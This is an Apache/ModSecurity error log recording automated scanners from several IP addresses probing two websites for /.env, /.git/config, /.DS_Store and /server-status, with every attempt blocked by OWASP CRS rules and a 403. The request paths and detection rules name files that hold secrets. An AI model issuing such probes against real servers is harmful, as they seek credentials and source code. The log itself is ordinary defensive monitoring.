[Thu Nov 06 18:04:58.894036 2025] [:error] [pid 4048982] [client 46.101.1.225:46164] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQzVOqaWbJHdbscBJCV_CQAAAAU"]
[Thu Nov 06 18:04:58.894277 2025] [:error] [pid 4048982] [client 46.101.1.225:46164] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQzVOqaWbJHdbscBJCV_CQAAAAU"]
[Thu Nov 06 18:04:58.894484 2025] [:error] [pid 4048982] [client 46.101.1.225:46164] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQzVOqaWbJHdbscBJCV_CQAAAAU"]
[Thu Nov 06 18:04:58.984721 2025] [:error] [pid 4046157] [client 46.101.1.225:46172] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQzVOo6_nbsqwaQSiZag2AAAAAc"]
[Thu Nov 06 18:04:58.984937 2025] [:error] [pid 4046157] [client 46.101.1.225:46172] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQzVOo6_nbsqwaQSiZag2AAAAAc"]
[Thu Nov 06 18:04:58.985113 2025] [:error] [pid 4046157] [client 46.101.1.225:46172] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQzVOo6_nbsqwaQSiZag2AAAAAc"]
[Thu Nov 06 18:04:59.074448 2025] [:error] [pid 4057428] [client 46.101.1.225:46180] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQzVO08hS6nvY516w46ZzAAAAAg"]
[Thu Nov 06 18:04:59.074690 2025] [:error] [pid 4057428] [client 46.101.1.225:46180] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQzVO08hS6nvY516w46ZzAAAAAg"]
[Thu Nov 06 18:04:59.076885 2025] [:error] [pid 4057428] [client 46.101.1.225:46180] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQzVO08hS6nvY516w46ZzAAAAAg"]
[Thu Nov 06 18:38:08.130303 2025] [authz_core:error] [pid 4057426] [client 206.81.24.74:52548] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Nov 06 18:38:08.482955 2025] [:error] [pid 4045866] [client 206.81.24.74:52580] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQzdACnx5cxH-jbB5zLI6QAAAAA"]
[Thu Nov 06 18:38:08.483166 2025] [:error] [pid 4045866] [client 206.81.24.74:52580] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQzdACnx5cxH-jbB5zLI6QAAAAA"]
[Thu Nov 06 18:38:08.483332 2025] [:error] [pid 4045866] [client 206.81.24.74:52580] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQzdACnx5cxH-jbB5zLI6QAAAAA"]
[Thu Nov 06 18:38:08.820270 2025] [:error] [pid 4046156] [client 206.81.24.74:52588] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQzdAAm7cMO1t0UBGyq3HQAAAAY"]
[Thu Nov 06 18:38:08.820498 2025] [:error] [pid 4046156] [client 206.81.24.74:52588] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQzdAAm7cMO1t0UBGyq3HQAAAAY"]
[Thu Nov 06 18:38:08.820686 2025] [:error] [pid 4046156] [client 206.81.24.74:52588] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQzdAAm7cMO1t0UBGyq3HQAAAAY"]
[Thu Nov 06 18:38:09.084873 2025] [:error] [pid 4053639] [client 206.81.24.74:52594] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQzdAah14EGMkZWBLRpPHQAAAAQ"]
[Thu Nov 06 18:38:09.085090 2025] [:error] [pid 4053639] [client 206.81.24.74:52594] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQzdAah14EGMkZWBLRpPHQAAAAQ"]
[Thu Nov 06 18:38:09.085247 2025] [:error] [pid 4053639] [client 206.81.24.74:52594] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQzdAah14EGMkZWBLRpPHQAAAAQ"]
[Fri Nov 07 01:21:47.436204 2025] [authz_core:error] [pid 4067062] [client 157.230.19.140:44514] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 07 01:21:48.356043 2025] [:error] [pid 4067061] [client 157.230.19.140:44544] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ07nGa_dN3KlCUIpTNyEAAAAA4"]
[Fri Nov 07 01:21:48.356265 2025] [:error] [pid 4067061] [client 157.230.19.140:44544] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ07nGa_dN3KlCUIpTNyEAAAAA4"]
[Fri Nov 07 01:21:48.356433 2025] [:error] [pid 4067061] [client 157.230.19.140:44544] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ07nGa_dN3KlCUIpTNyEAAAAA4"]
[Fri Nov 07 01:21:49.143953 2025] [:error] [pid 4069559] [client 157.230.19.140:44548] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ07na1HGKvx_IVXfJBImwAAAAQ"]
[Fri Nov 07 01:21:49.144171 2025] [:error] [pid 4069559] [client 157.230.19.140:44548] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ07na1HGKvx_IVXfJBImwAAAAQ"]
[Fri Nov 07 01:21:49.144339 2025] [:error] [pid 4069559] [client 157.230.19.140:44548] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ07na1HGKvx_IVXfJBImwAAAAQ"]
[Fri Nov 07 01:21:49.399726 2025] [:error] [pid 4067065] [client 157.230.19.140:44562] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ07neK41NR4Q4xSH5diIQAAABA"]
[Fri Nov 07 01:21:49.399956 2025] [:error] [pid 4067065] [client 157.230.19.140:44562] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ07neK41NR4Q4xSH5diIQAAABA"]
[Fri Nov 07 01:21:49.400117 2025] [:error] [pid 4067065] [client 157.230.19.140:44562] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ07neK41NR4Q4xSH5diIQAAABA"]
[Fri Nov 07 01:41:34.300221 2025] [:error] [pid 4067061] [client 46.193.67.68:43114] [client 46.193.67.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ1APma_dN3KlCUIpTNyFQAAAA4"]
[Fri Nov 07 01:41:34.300474 2025] [:error] [pid 4067061] [client 46.193.67.68:43114] [client 46.193.67.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ1APma_dN3KlCUIpTNyFQAAAA4"]
[Fri Nov 07 01:41:34.300642 2025] [:error] [pid 4067061] [client 46.193.67.68:43114] [client 46.193.67.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ1APma_dN3KlCUIpTNyFQAAAA4"]
[Fri Nov 07 03:49:39.216715 2025] [:error] [pid 4071231] [client 54.81.31.187:45274] [client 54.81.31.187] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ1eQznPJ130NLyIkNEcZwAAAAE"]
[Fri Nov 07 03:49:39.217043 2025] [:error] [pid 4071231] [client 54.81.31.187:45274] [client 54.81.31.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ1eQznPJ130NLyIkNEcZwAAAAE"]
[Fri Nov 07 03:49:39.217208 2025] [:error] [pid 4071231] [client 54.81.31.187:45274] [client 54.81.31.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ1eQznPJ130NLyIkNEcZwAAAAE"]
[Fri Nov 07 07:16:10.577672 2025] [authz_core:error] [pid 4071230] [client 139.59.132.8:57284] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 07 07:16:12.010007 2025] [:error] [pid 4071264] [client 139.59.132.8:57316] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ2OrJQGYRwWEN_7vnpZuQAAAAU"]
[Fri Nov 07 07:16:12.010230 2025] [:error] [pid 4071264] [client 139.59.132.8:57316] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ2OrJQGYRwWEN_7vnpZuQAAAAU"]
[Fri Nov 07 07:16:12.010422 2025] [:error] [pid 4071264] [client 139.59.132.8:57316] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ2OrJQGYRwWEN_7vnpZuQAAAAU"]
[Fri Nov 07 07:16:12.228104 2025] [:error] [pid 4071232] [client 139.59.132.8:57332] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ2OrO-SZFoRMOuHKaidJgAAAAI"]
[Fri Nov 07 07:16:12.228320 2025] [:error] [pid 4071232] [client 139.59.132.8:57332] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ2OrO-SZFoRMOuHKaidJgAAAAI"]
[Fri Nov 07 07:16:12.228504 2025] [:error] [pid 4071232] [client 139.59.132.8:57332] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ2OrO-SZFoRMOuHKaidJgAAAAI"]
